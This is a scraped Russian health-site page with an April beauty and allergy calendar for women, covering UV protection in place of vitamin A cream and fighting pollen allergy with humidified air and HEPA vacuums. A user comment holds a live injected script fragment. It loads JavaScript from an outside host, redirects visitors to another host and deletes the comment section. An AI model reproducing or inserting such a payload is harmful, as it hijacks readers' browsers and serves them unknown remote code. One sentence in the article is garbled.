Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Календарь для женщин. Апр...  >>  Календарь для женщин. Апрель
 
Обратная связь
 

Календарь для женщин. Апрель

Размер шрифта
01 апреля 2012 09:50
  • google_analytics: false
  • Нравится

В апреле солнце пригревает сильнее, появляются первые цветы. Для кого-то этот месяц – радость, но для многих других апрель – это начало сезона аллергий, пигментных пятен и веснушек. Какие процедуры необходимо сделать в апреле для красоты и здоровья, расскажет апрельский Календарь.

Календарь для женщин. Апрель.

Совет: Замените питательный крем с витамином А на крем с защитой от УФ-излучения.

Объяснение

Крем с витамином А усиливает созревание новых клеток кожи, и они быстро поднимаются на поверхность. Старые клетки при этом так же быстро отшелушиваются. В результате кожа более молодая, но и более тонкая. Под действием УФ-лучей на такой коже могут возникнуть пигментные пятна. И начало весны – особенно опасное в этом смысле время года.

Что делать

Крем против УФ-лучей создает на коже защитную пленку, которая будет отражать солнечные лучи, не давая им проникать вглубь кожи. Кожа не будет терять влагу, коллагеновые волокна не будут разрушаться, а кожа остается молодой.

Совет: Подготовьтесь к борьбе с весенним поллинозом.

Весна – пора цветения. Необходима защита от пыльцы растений, которая у некоторых людей может вызывать возникновение или обострение поллиноза.

Что делать?

Главный источник аллергенов – домашняя пыль. Чтобы уничтожить ее, но увлажнить воздух в квартире. В таком случае пыль из него будет оседать вместе с пыльцой или пухом.

Как увлажнить воздух в квартире

  • Увлажнять марлю в форточке
  • Установить в квартире увлажнитель воздуха

Для уборки квартиры используйте пылесос со специальным НЕРА-фильтром, который способен задерживать самые мелкие частицы из выдуваемого обратно в помещение воздуха.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:46

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Грипп и ОРВИ у детей-аллергиков. Как помочь ребенку?   Болезни-близнецы. Поллиноз и простуда   Какие надписи на косметике вам врут, а какие нет?   Слишком чисто тоже плохо! Чистота вызывает аллергию!  
21 июня 2013Хочешь, чтобы у твоего ребенка не было аллергии, – пососи его соску! 09 июня 2012Дети, проживающие в сельской местности, реже страдают аллергией
 
16 февраля 2012Новая молекула вылечит от аллергии 13 октября 2011Арахис больше не опасен для аллергиков
 

Слайдшоу

1
Как снова хотеть секса
Ужасные мозоли! Как от них избавиться?
Болезни, которые превратят вашу кожу в кошмар!

Тесты

Что вы знаете об аллергии?
Как выявить контактный дерматит?
Контрольная по носу
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.